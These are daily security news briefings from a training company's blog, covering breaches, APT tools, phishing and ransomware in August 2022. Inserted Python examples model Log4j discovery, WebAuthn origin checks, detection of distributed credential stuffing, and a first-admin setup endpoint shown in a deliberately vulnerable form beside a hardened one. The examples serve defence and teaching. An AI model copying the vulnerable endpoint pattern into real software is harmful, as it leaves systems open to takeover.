Blog entries about Les Bell and Associates Pty Ltd

by Les Bell - Sunday, August 28, 2022, 4:52 PM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Atlassian Bitbucket RCE Vulnerability

Atlassian's developers must be feeling somewhat punch-drunk by now, after so many disclosures. Now security researcher 'The Grand Pew' has disclosed, via Bugcrowd's bug bounty program, a command injection vulnerability affecting all versions between 7.0.0 and 8.3.0 of the company's git-based source code repository server, Bitbucket.

Users are advised to upgrade promptly; failing that, they should turn off public repositories. The vulnerability affects multiple API endpoints in Bitbucket.

Haworth, Jessica, Critical command injection vulnerability discovered in Bitbucket Server and Data Center, The Daily Swig, 26 August 2022. Available online at https://portswigger.net/daily-swig/critical-command-injection-vulnerability-discovered-in-bitbucket-server-and-data-center.

Clouds Gather Over LastPass

The popular password safe application, LastPass, has suffered yet another breach, this time affecting its source code. As in previous breaches, the company can claim - justifiably - that no user data has been compromised, as all its customers' passwords are encrypted under each customer's master password.

However, in this case, the attackers were able to compromise a developer account to gain access to "portions of source code and some proprietary LastPass technical information". This makes the breach a good test of Kerckhoffs's second principle - "security of an encryption system must depend upon the secrecy of a key and not upon secrecy of the system" - because whoever got that source code and technical info is going to be poring over it in search of some kind of implementation weakness or other exploitable vulnerability. LastPass customer data is probably OK, but I'm glad to be using a different product.

Seals, Tara, LastPass Suffers Data Breach, Source Code Stolen, Dark Reading, 27 August 2022. Available online at https://www.darkreading.com/cloud/lastpass-data-breach-source-code-stolen.

Log4J Still a Problem

The Iranian threat actor Static Kitten (a.k.a. MuddyWater, Cobalt Ulster, Mercury and others) is targeting Israeli organizations running unpatched versions of Log4j. It might seem incredible that the long-known Log4Shell exploit would still be exploitable, but the fact that Log4j is embedded in so many systems, and that most enterprises do not have a configuration management system capable of reporting whether they have Log4j installed, and if so, where, indicates that this vulnerability is likely to be a thorn in our sides for some time to come.

Lakshmanan, Ravie, Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations, The Hacker News, 27 August 2022. Available online at https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html.
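The inventory gap described above - not knowing where Log4j is installed - is the part a defender can actually do something about. The following is an added example, not code from the story or from the Log4j project: it walks a directory tree, opens every jar, war, ear or zip it finds, recurses into archives nested inside those archives (the usual place a bundled log4j-core hides), and reports the version recorded in the jar's Maven pom.properties. The directory layout and jar contents in build_sample_tree() are constructed test data; the marker paths JNDI_CLASS and POM_PROPS are the real entry names used by log4j-core, and the 2.17.1 threshold is the release that closed out the Log4Shell fix series.

```python
import io
import os
import re
import tempfile
import zipfile

# Marker entries found inside log4j-core jars (real artifact paths).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# 2.17.1 closed out the Log4Shell fix series; anything older needs attention.
PATCHED_RELEASE = (2, 17, 1)


def inspect_archive(zf, label):
    """Return findings for one open zip archive, recursing into embedded
    jars/wars so a log4j-core bundled inside an application archive is not missed."""
    findings = []
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        version = "unknown"
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode(errors="replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({"path": label, "version": version,
                         "jndi_lookup_present": JNDI_CLASS in names})
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue  # an entry named like an archive but not one
            findings.extend(inspect_archive(inner, f"{label}!{name}"))
    return findings


def scan_tree(root):
    """Walk a directory tree and report every log4j-core found, with its version."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(full) as zf:
                        findings.extend(inspect_archive(zf, full))
                except zipfile.BadZipFile:
                    continue
    return findings


def below_patched_release(version):
    """True if a 2.x version string sorts before PATCHED_RELEASE ('unknown' -> True)."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    if len(parts) < 2 or parts[0] != 2:
        return True  # unparseable or not a 2.x release: treat as needing review
    return (parts + (0,) * (3 - len(parts))) < PATCHED_RELEASE


def build_sample_tree():
    """Constructed test data (not a real deployment): a bare log4j-core 2.14.1 jar,
    a war embedding log4j-core 2.17.1, and an unrelated jar."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-")

    def log4j_jar_bytes(version):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
            z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        return buf.getvalue()

    os.makedirs(os.path.join(root, "app", "lib"))
    os.makedirs(os.path.join(root, "webapps"))
    with open(os.path.join(root, "app", "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(log4j_jar_bytes("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "app", "lib", "commons-io.jar"), "w") as z:
        z.writestr("org/apache/commons/io/IOUtils.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "webapps", "shop.war"), "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", log4j_jar_bytes("2.17.1"))
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        flag = "UPDATE" if below_patched_release(hit["version"]) else "ok"
        print(f'{flag:6} {hit["version"]:8} {hit["path"]}')
```

Point scan_tree() at a real application root to get the same report; the recursion is what distinguishes this from a filename search, since a vulnerable log4j-core inside a war never appears as a file on disk.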

Return-to-Work and Catch COVID?

While many managers, and some corporations, are struggling with how to manage employees working from home, the idea of a full return to work is deeply unattractive to many. Case in point: Google, which in April demanded employees return to the office for at least three days a week.

The result? Increased outbreaks of COVID-19 - currently, Google's LA offices are recording the most infections of any employer in that city, with 145 cases at their Venice office and 135 in the Playa Vista campus. Employees, fed up with the number of exposure notifications they are receiving, point out that the company has been recording record growth while they worked from home.

Complicating things further, unvaccinated employees are asking the company to drop its vaccination mandate for on-prem workers. Vaccinated staffers who would rather work from home anyway are doubtless really impressed with this.

Elias, Jennifer, Google employees frustrated after office Covid outbreaks, some call to modify vaccine policy, CNBC, 26 August 2022. Available online at https://www.cnbc.com/2022/08/26/google-employees-frustrated-after-office-covid-outbreaks.html.

Disinformation Bad - Meta-Disinformation Worse

An opinion piece by a RAND Corporation information scientist points out that the capabilities of artificial intelligence and the immersive nature of virtual reality will combine to make disinformation campaigns much more influential and effective. Rand Waltzman describes a scenario in which an audience watches a political candidate giving a speech - but unknown to them, each viewer sees a subtly different version of the candidate - one which has been modified to make his facial features slightly more similar to the viewer's, a technique which has been shown experimentally to make voters rate the candidate more favourably.

The author also points out that virtual environments are seductive because of two features - presence and embodiment. Presence means that the clues that a computer is mediating communication are no longer present - communication feels very direct - while embodiment is the sensation that the virtual body is the actual body. This makes emotional manipulation of the participant very much more powerful than traditional media and social media - and we should have learned by now just how dangerous those can be.

Waltzman, Rand, Facebook MisInformation is Bad Enough. The Metaverse Will Be Worse, The RAND Blog, 22 August 2022. Available online at https://www.rand.org/blog/2022/08/facebook-misinformation-is-bad-enough-the-metaverse.html.


The next few days' Security News may appear at odd times, as travel interferes with the work cycle.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Monday, August 29, 2022, 9:01 AM ]
 
by Les Bell - Friday, August 26, 2022, 9:46 AM


News Stories


Spearphishing Group Targets South Korean Politicians and Diplomats

South Korean academics, diplomats and government officials are yet again being targeted by the North Korean group Kimusky, otherwise known as GoldDragon. The group is using targeted emails which contain macro-enabled MS Word documents which, when opened, will download a Visual Basic script from a C2 server. The script profiles the victim's computer and will then fetch additional payloads. 

Interestingly, if the user clicks on a link which promises additional interesting documents, the link submits their email address - and if this is of no interest to the attacker, it then returns an uninfected document, indicating a highly targeted approach.

Lakshmanan, Ravie, Researchers Uncover Kimusky Infra Targeting South Korean Politicians and Diplomats, The Hacker News, 25 August 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-kimusky-infra.html.

Okta IAM Breach Implications Spread

The phishing attack, based on fake Okta sign-in pages, that caught Twilio employees early this month continues to ripple throughout industry. The attackers were able to fool many employees into handing over their login credentials and thereby gain access to Twilio internal systems. However, the same breach has been revealed to have affected 25 organisations so far, including Cloudflare, Signal and Mailchimp; others may not even realise they have been compromised.

The breach may cause many to rethink the use of federated identity management systems and cloud SaaS IAM services. For Cloudflare, the saving grace was their requiring FIDO U2F security keys to access their internal systems.

Seals, Tara, Twilio Hackers Scarf 10K Okta Credentials in Sprawling Supply Chain Attack, Dark Reading, 26 August 2022. Available online at https://www.darkreading.com/remote-workforce/twilio-hackers-okta-credentials-sprawling-supply-chain-attack.

Cozy Bear Tool Blows Through Active Directory Federation Services

Russian state-sponsored group APT 29 (Cozy Bear, Nobelium) has been discovered using a new tool called 'MagicWeb' that allows hackers to create accounts and masquerade as any user on a network that uses Active Directory Federation Services. The tool works by replacing the Microsoft.IdentityServer.Diagnostics.dll file with a back-doored version. The new version runs initialization code that hooks into the server and allows attackers to force Active Directory to accept any client certificate they create as being valid and add fraudulent claims for those certificates.

This is an extremely potent attack against enterprises that use ADFS, but only those specifically targeted by the threat actor are likely to encounter it. Simple IoCs are unlikely to work for this sophisticated attacker, so potential victims need to ensure their threat hunters know what to look for.

Uncredited, MagicWeb: NOBELIUM's post-compromise trick to authenticate as anyone, Microsoft Security, 24 August 2022. Available online at https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/.

New Group for Women CISOs and Senior Execs

At the 2014 RSA Conference a small group of senior women, dismayed that the dominant form of female representation there was as 'booth babes', started a Facebook group in an attempt to get away from this lazy approach to marketing. The movement has grown over the years, now formally establishing an advocacy and education non-profit to further the aims of the community.

The Forte Group aims to elevate the positive role of cybersecurity in business, offering board level governance and connections. The group will also offer career assistance and mentoring to women in cybersecurity and privacy.

Jackson Higgins, Kelly, Senior-Level Women Leaders in Cybersecurity Form New Nonprofit, Dark Reading, 26 August 2022. Available online at https://www.darkreading.com/remote-workforce/senior-level-women-leaders-cybersecurity-nonprofit.


 
by Les Bell - Wednesday, August 24, 2022, 4:11 PM


News Stories


Mudge Drops Twitter Right In It

As Elon Musk alleges that Twitter executives are clueless about the number of bots on the platform, former Twitter CSO Peiter "Mudge" Zatko has sent documents to US Congress, the Federal Trade Commission, the SEC and the Department of Justice alleging that the social media platform is rife with security problems such as a lack of adequate access controls and security governance.

In the 200-page document, Zatko alleges that Twitter engineers have unfettered access to the company's production systems and that the company's procedures for data center recovery are lax or non-existent. He further says that security oversight is so weak that some of the company's employees may even be agents of foreign governments. Twitter, for its part, claims that all is right with its world, that Zatko does not understand its SEC reporting requirements, and that this is a case of sour grapes. Security professionals who have known Mudge for decades are not so sure.

O'Sullivan, Donie et al., Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies, CNN Business, 23 August 2022. Available online at https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html.

Iranian APT's New Tool Plunders Google, Outlook, Yahoo Accounts

Google's Threat Analysis Group has found that APT 35, variously known as Charming Kitten, Yellow Garuda and Cobalt Illusion, and associated with the Iranian Revolutionary Guard Corps, has developed a new tool which allows it to rapidly extract the contents of email accounts.

The HYPERSCRAPE tool, which is written in a .NET language, requires the attacker to have acquired a session using the victim's credentials, perhaps by means of a cookie-stealing attack. Once this has been done, the program can systematically plunder the victim's mailbox, downloading all the emails but resetting the status to 'unread' where required. It also deletes emails which it sees contain security alerts, to keep the victim in the dark about the compromise. It's not sophisticated, but it's certainly effective.

Lakshmanan, Ravie, Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts, The Hacker News, 23 August 2022. Available online at https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html.

Dominican Republic Hit By Ransomware

The organization within the Department of Agriculture of the Dominican Republic that is responsible for agricultural reform has been hit by a ransomware attack. The Quantum ransomware is really a derivative of MountLocker, and the group behind it is yet another offshoot of the Conti ransomware gang.

All the servers of the Instituto Agrario Dominicano (IAD) were encrypted in the attack, with $US600,000 demanded for the key. However, the organization is unlikely to be able to afford to pay the ransom; it could not afford more than the most basic antivirus software and has no dedicated security personnel.

Abrams, Lawrence, Quantum ransomware attack disrupts govt agency in Dominican Republic, Bleeping Computer, 24 August 2022. Available online at https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/.

Adversary-in-the-Middle Attacks Target 365, Workspace Users

An as-yet-unidentified threat actor is running a large campaign against senior executives of companies who use Microsoft 365 and Google Workspace enterprise accounts. The initial spear-phishing part of the campaign works by sending the victims fake emails from the DocuSign email agreement platform; the "Review Document" button takes them to a fake login page which functions as a proxy to capture their credentials and also break the multi-factor authentication process.

Once this has been done, the attackers add a second authentication device to the account, and then use some sophisticated social engineering to insert themselves into conversation threads, posing as legitimate. In the final, highly-targeted part of the process, they generate an email to the target, informing them that a bank account they were to make a payment to has been frozen for audit, and providing updated payment details for an account which they control.

Toulas, Bill, Hackers use AiTM attack to monitor Microsoft 365 accounts for BEC scams, Bleeping Computer, 24 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-use-aitm-attack-to-monitor-microsoft-365-accounts-for-bec-scams/.

Lakshmanan, Ravie, Researchers Warn of AiTM Attack Targeting Google G-Suite Enterprise Users, The Hacker News, 24 August 2022. Available online at https://thehackernews.com/2022/08/researchers-warn-of-aitm-attack.html.
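Two stories this week turn on the same mechanism: the Okta-themed phishing that Cloudflare survived because it required FIDO U2F keys, and the AiTM proxy above that captures credentials and "breaks" multi-factor authentication. The following is an added example, not code from either story or from any vendor, that models why a proxy can relay a one-time code but cannot relay a WebAuthn/FIDO assertion. The hostnames and challenge values are constructed; the credential "signature" is an HMAC with a shared demo key standing in for the real asymmetric signature, which keeps the example dependency-free without changing the checks a relying party performs.

```python
import hashlib
import hmac
import json

# Constructed identifiers for the example (not from the stories).
RP_ID = "example.com"
EXPECTED_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login.example-secure.com"   # the AiTM proxy's own hostname

# Stand-in for the credential key pair.  Real WebAuthn uses an asymmetric
# signature (e.g. ES256) verified with the public key stored at registration;
# an HMAC with a shared demo key keeps the example self-contained.
CREDENTIAL_KEY = b"constructed-demo-credential-key"


def rp_id_hash(rp_id):
    return hashlib.sha256(rp_id.encode()).digest()


def authenticator_assertion(challenge, browser_origin, browser_rp_id):
    """Model of what browser + authenticator return for navigator.credentials.get().
    The BROWSER writes the origin it is actually connected to into clientDataJSON;
    the page's JavaScript cannot override it."""
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": browser_origin},
        sort_keys=True).encode()
    # authenticatorData: rpIdHash (32 bytes) || flags (UP set) || signCount
    auth_data = rp_id_hash(browser_rp_id) + b"\x01" + b"\x00\x00\x00\x01"
    to_sign = auth_data + hashlib.sha256(client_data).digest()
    signature = hmac.new(CREDENTIAL_KEY, to_sign, hashlib.sha256).digest()
    return client_data, auth_data, signature


def rp_verify(expected_challenge, client_data, auth_data, signature):
    """Relying-party checks, in the order the WebAuthn spec lists them."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != expected_challenge:
        return False, "challenge mismatch (replay?)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: {cd.get('origin')}"
    if auth_data[:32] != rp_id_hash(RP_ID):
        return False, "rpIdHash mismatch"
    expected_sig = hmac.new(CREDENTIAL_KEY,
                            auth_data + hashlib.sha256(client_data).digest(),
                            hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, signature):
        return False, "bad signature"
    return True, "ok"


def legitimate_login(challenge):
    """User on the real site: browser origin and rpId are the genuine ones."""
    return rp_verify(challenge, *authenticator_assertion(challenge, EXPECTED_ORIGIN, RP_ID))


def aitm_relayed_login(challenge):
    """AiTM: the proxy fetched the real challenge and relays it to the victim, but
    the victim's browser is connected to the proxy's origin.  The browser also
    refuses an rpId that is not a registrable suffix of that origin, so the proxy
    can at best obtain an assertion scoped to its own domain."""
    proxy_rp_id = "example-secure.com"
    return rp_verify(challenge, *authenticator_assertion(challenge, PHISH_ORIGIN, proxy_rp_id))


def relayed_otp_login(code_typed_into_proxy, code_expected_by_rp):
    """Contrast: a TOTP/SMS code carries no origin, so a proxy that forwards it
    within its validity window is indistinguishable from the real user."""
    return hmac.compare_digest(code_typed_into_proxy, code_expected_by_rp)


if __name__ == "__main__":
    ch = "0123456789abcdef0123456789abcdef"
    print("real site :", legitimate_login(ch))
    print("via proxy :", aitm_relayed_login(ch))
    print("OTP relay :", relayed_otp_login("482913", "482913"))
```

The origin check is the whole story: the relying party rejects the relayed assertion before it even looks at the signature, which is why a phishing-resistant factor protects users who have already been fooled into typing their password into the proxy.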


[ Modified: Thursday, August 25, 2022, 9:11 AM ]
 
by Les Bell - Tuesday, August 23, 2022, 8:34 PM


News Stories


Counterfeit Phones Harbour WhatsApp Back Doors

Antivirus firm Dr. Web has discovered a number of low-end Android smartphones which carry pre-installed malware intended to target the WhatsApp and WhatsApp Business messaging apps. The phones, which are designed and named to mimic some high-end models, are popular in Asia, as is WhatsApp. This type of phone is also often picked up as a spare by travellers for use with a local SIM.

The back doors are present in the system partition of the phones, which actually have an outdated version of Android installed. One of the main Android system libraries has been slightly modified so that, when called from an application, it loads a trojan from the file libmtd.so. This checks to see which application caused it to load, and if it is WhatsApp or the "Settings" or "Phone" system apps, it then proceeds to load a second-stage trojan, which sends system information to a C2 server, which replies with a list of available plugins. From there, the trojan has full access to the application's files and can read chat messages, send spam, intercept and listen to phone calls and many other actions.

Uncredited, Doctor Web identifies attack on WhatsApp and WhatsApp Business messengers installed on counterfeit Android devices, Dr. Web, 22 August 2022. Available online at https://news.drweb.com/show/?i=14542&lng=en.

Residential Proxies Used for Credential Stuffing Attacks

The FBI and Australian Federal Police have jointly warned that threat actors are using proxies on residential service provider networks to run credential stuffing attacks. By doing this, rather than repeatedly using a single IP address, they make it hard for firewalls to identify and rate limit the attacks.

Naive home users are often attracted to install proxy software on the promise that they will be pooling their bandwidth with that of other users and will therefore be able to enjoy faster downloads or earn some money from selling their unused bandwidth. This is, of course, technical nonsense - your cable modem or ADSL connection is a single pipe of fixed 'diameter' and you cannot get more through it by using someone else's pipe that links them to the Internet. Nevertheless, having installed the software, they now represent an opportunity for cyber criminals.

Residential networks are also a more likely source for web traffic; firewalls are more likely to block attempted logons from data center networks - although having said that, I routinely observe attempts to send traffic through the mod_proxy module on my own web servers.

Uncredited, Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts, FBI Private Industry Notification, 18 August 2022. Available online at https://www.ic3.gov/Media/News/2022/220818.pdf.
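The point of spreading a credential stuffing run across residential proxies is that the per-IP rule a firewall applies never fires. The following is an added example, not code from the FBI notification, that runs both kinds of rule over a constructed authentication log: the classic "too many failures from one address" check, and a source-agnostic check that looks for a burst of failures in which nearly every attempt comes from a different address, reporting the dominant client fingerprint (User-Agent), which the proxy pool usually shares. The log format, addresses (documentation ranges) and thresholds are all assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the FBI notification): two ordinary events for
# one user, then ten failures for ten different accounts within half a minute,
# each from a different documentation-range address but all sharing one
# User-Agent, then one more ordinary login.
SAMPLE_LOG = [
    '2022-08-22T09:58:10Z ip=203.0.113.5 user=alice result=FAIL ua="Mozilla/5.0 (Macintosh) Safari/605.1.15"',
    '2022-08-22T09:58:25Z ip=203.0.113.5 user=alice result=OK ua="Mozilla/5.0 (Macintosh) Safari/605.1.15"',
] + [
    f'2022-08-22T10:00:{3 * i:02d}Z ip=198.51.100.{10 + i} user=user{i:02d} result=FAIL '
    f'ua="Mozilla/5.0 (Windows NT 10.0) Chrome/104.0"'
    for i in range(10)
] + [
    '2022-08-22T10:05:00Z ip=203.0.113.77 user=bob result=OK ua="Mozilla/5.0 (X11; Linux x86_64) Firefox/104.0"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\w+) ua="(?P<ua>[^"]*)"$')


def parse(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the format
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def per_ip_offenders(events, max_failures=5, window=timedelta(minutes=10)):
    """The classic firewall rule: an address with too many failures in the window.
    Returns the set of offending IPs."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            failures[e["ip"]].append(e["ts"])
    offenders = set()
    for ip, times in failures.items():
        times.sort()
        j = 0
        for i, start in enumerate(times):
            while j < len(times) and times[j] - start <= window:
                j += 1
            if j - i >= max_failures:
                offenders.add(ip)
                break
    return offenders


def distributed_stuffing(events, window=timedelta(minutes=1), min_failures=8, min_ip_ratio=0.8):
    """Source-agnostic rule for proxy-spread attacks: slide a window over the
    failed logins and flag a burst in which nearly every failure comes from a
    different address.  Reports the burst's size, spread and dominant User-Agent."""
    fails = sorted((e for e in events if e["result"] == "FAIL"), key=lambda e: e["ts"])
    for i, first in enumerate(fails):
        burst = [e for e in fails[i:] if e["ts"] - first["ts"] <= window]
        if len(burst) < min_failures:
            continue
        ips = {e["ip"] for e in burst}
        if len(ips) / len(burst) < min_ip_ratio:
            continue
        ua, ua_count = Counter(e["ua"] for e in burst).most_common(1)[0]
        return {
            "start": first["ts"],
            "failures": len(burst),
            "distinct_ips": len(ips),
            "distinct_users": len({e["user"] for e in burst}),
            "dominant_ua": ua,
            "dominant_ua_share": ua_count / len(burst),
        }
    return None


EVENTS = parse(SAMPLE_LOG)

if __name__ == "__main__":
    print("per-IP rule flags:", per_ip_offenders(EVENTS) or "nothing")
    print("distributed rule :", distributed_stuffing(EVENTS))
```

On the sample the per-IP rule returns nothing, because no address fails more than once, while the burst rule reports ten failures from ten addresses against ten accounts with a single shared User-Agent. The response to that signal is account-side (step-up authentication, a short-lived global throttle on failed logins) rather than blocking addresses that belong to somebody's home connection.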

New Malware Combines RAT, Spyware and Ransomware

A new remote access trojan called Borat RAT has additional capabilities, being able to download a ransomware payload to the victim's machine and also run as a keylogger. The malware, discovered and named by Cyble, can also operate as a remote proxy, credential stealer and trojan dropper. It has a few other tricks which seem primarily intended to annoy or intimidate its victim, such as turning the monitor on and off, hiding and unhiding the taskbar and start button. It can also record audio and video if a microphone and webcam are discovered.

Uncredited, Meet Borat RAT, a New Unique Triple Threat, The Hacker News, 22 August 2022. Available online at https://thehackernews.com/2022/08/meet-borat-rat-new-unique-triple-threat.html.

Yet Another Air Gap Technique

Dr. Mordechai Guri of Ben Gurion University of the Negev, who specialises in devising incredibly ingenious techniques for exfiltrating data across air gaps, has come up with yet another. This time, he has used the micro-electro-mechanical gyroscope found in many smartphones to pick up ultrasonic tones which are generated by a nearby infected computer and demodulate them into binary data. By using the gyroscope, the exploit avoids using the microphone, which is highly protected - the gyroscope is generally regarded as safe for apps to use.

Dr Guri's experiments show that, after infecting the victim computer, perhaps via a compromised USB key, attackers can exfiltrate sensitive data over a few meters of air gap, using this 'speakers-to-gyroscope' covert channel. By now, Dr. Guri and his research group have pretty much demolished the notion that information cannot be exfiltrated from a computer that is not connected to any kind of network or communications link.

Guri, Mordechai, GAIROSCOPE: Injecting Data from Air-Gapped Computers to Nearby Gyroscopes, 18th Intl. Conf. on Privacy, Security and Trust (PST), Auckland, 21 December 2021. Available online at https://arxiv.org/abs/2208.09764.



 
by Les Bell - Tuesday, August 23, 2022, 9:04 AM


News Stories


Ancient Linux Vuln Allows Privilege Escalation

An eight-year old memory management vulnerability in the Linux kernel could allow privilege escalation, say three academics from Northwestern University. The DirtyCred proof-of-concept exploit works by swapping unprivileged task credentials in memory with root credentials from a SetUID process, making use of a bug in the kernel's heap memory reuse code.

Lakshmanan, Ravie, "As Nasty as Dirty Pipe" - 8 Year Old Linux Kernel Vulnerability Uncovered, The Hacker News, 22 August 2022. Available online at https://thehackernews.com/2022/08/as-nasty-as-dirty-pipe-8-year-old-linux.html.

Healthcare Info of Almost 1.4 M Patients Exposed Via Ad Tracker

A US healthcare provider, Novant Health, has revealed that the sensitive information of 1,362,296 patients was accidentally disclosed when an advertising performance tracker script was misconfigured. The company added the Meta (formerly Pixel) JavaScript ad tracking script to a May 2020 promotional campaign for COVID-19 vaccinations which made use of Facebook advertisements.

However, the tracker was misconfigured both on the Novant Health site and the 'MyChart' portal, which allows patients to book appointments, request prescription refills and other services with 64 US healthcare providers. The misconfiguration exposed a long list of sensitive data, including email address, phone number, appointment type and date, both to Facebook/Meta and its advertising partners.

Novant discovered the issue in May 2022 and has contacted all the people affected. However, they also say that attempts to get Meta to delete the data were met with no response.

Toulas, Bill, Misconfigured Meta Pixel exposed healthcare data of 1.3M patients, Bleeping Computer, 22 August 2022. Available online at https://www.bleepingcomputer.com/news/security/misconfigured-meta-pixel-exposed-healthcare-data-of-13m-patients/.

Bitcoin Stolen from General Bytes ATMs

Unknown hackers have been able to exploit a fairly obvious vulnerability in the Crypto Application Server that controls General Bytes Bitcoin ATMs, and thereby steal cryptocurrencies from the ATM customers. The hack was achieved by the simple act of calling an admin URL that is used for initial installation of the server and creates the first admin user. By calling this API and creating an admin user called 'gb', the attackers were then able to modify the 'buy', 'sell' and 'invalid payment address' settings to use a crypto wallet that they controlled.

From that point on, any cryptocurrencies received by the ATM went to the hackers, rather than the intended destination.

The moral of the story? Review any installation scripts and remove them after installation has been completed. Allow admin access only from trusted subnets. And, of course, patch proactively.

Abrams, Lawrence, Hackers steal crypto from Bitcoin ATM's by exploiting zero-day bug, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-steal-crypto-from-bitcoin-atms-by-exploiting-zero-day-bug/.
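The moral above is easy to state and easy to get wrong in code, so here is an added example, not the General Bytes server's code (which is not on the page) but a generic reconstruction of the pattern the story describes: a bootstrap endpoint that creates the first admin, shown in the always-on form beside a hardened form that is reachable only from a trusted management subnet, refuses once any admin exists, and records every refusal for alerting. The subnet, the store layout and the usernames other than 'gb' are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass, field

# Assumption for the example: the operator's management subnet.
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]


@dataclass
class AdminStore:
    admins: dict = field(default_factory=dict)  # username -> secret (demo only; real code stores a hash)
    audit: list = field(default_factory=list)   # rejected calls, for alerting


def vulnerable_create_first_admin(store, source_ip, username, secret):
    """The pattern described in the story: a setup endpoint that creates an
    admin on every call, from any network, and stays enabled after installation."""
    store.admins[username] = secret
    return 200, f"admin '{username}' created"


def hardened_create_first_admin(store, source_ip, username, secret):
    """Same endpoint with the three controls from the story's moral: reachable
    only from trusted subnets, one-shot (refuses once any admin exists), and
    every refusal recorded so an attempt is visible to the defenders."""
    ip = ipaddress.ip_address(source_ip)
    if not any(ip in net for net in TRUSTED_ADMIN_NETS):
        store.audit.append(("untrusted-network", source_ip, username))
        return 403, "admin endpoints are not reachable from this network"
    if store.admins:
        store.audit.append(("bootstrap-after-install", source_ip, username))
        return 409, "installation already completed; bootstrap endpoint disabled"
    store.admins[username] = secret
    return 201, f"first admin '{username}' created"


def run_scenarios():
    """Replay the story's sequence against both versions; returns the outcomes."""
    results = {}
    # Already-installed server with the always-on endpoint: a call from an
    # arbitrary (documentation-range) address succeeds and adds 'gb'.
    v = AdminStore(admins={"operator": "s3cret"})
    results["vulnerable_from_internet"] = vulnerable_create_first_admin(v, "198.51.100.7", "gb", "x")[0]
    results["vulnerable_has_gb"] = "gb" in v.admins
    # Hardened server: outside call refused, first install from the management
    # subnet succeeds, any later call is refused and audited.
    h = AdminStore()
    results["hardened_from_internet"] = hardened_create_first_admin(h, "198.51.100.7", "gb", "x")[0]
    results["hardened_first_install"] = hardened_create_first_admin(h, "10.20.0.5", "operator", "s3cret")[0]
    results["hardened_second_call"] = hardened_create_first_admin(h, "10.20.0.5", "gb", "x")[0]
    results["hardened_has_gb"] = "gb" in h.admins
    results["hardened_audit_entries"] = len(h.audit)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:26} {outcome}")
```

The 409 branch is the one installers usually forget: network restriction alone still leaves the endpoint live for anyone who reaches the management subnet, whereas a one-shot endpoint has nothing to offer once installation is complete.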

LatentBot Mutates Into Grandoreiro

LatentBot is a trojan that dates back to 2013; written in Delphi, it has a modular design that allows it to download additional modules for keystroke logging, cookie-stealing and remote access. Since June 2022, a new derivative called Grandoreiro has appeared, targeting companies in Spanish-speaking countries with official-looking emails apparently from government agencies.

The victims are directed to download and share a document, but in practice, the link redirects to a malicious domain and then downloads a ZIP file containing the Grandoreiro loader. The loader goes through a number of antiforensics checks, such as walking through a list of currently executing processes, looking for malware analysis tools, seeing if it is being run from a particular directory, looking for debuggers and reading from an I/O port which is used by VMWare.
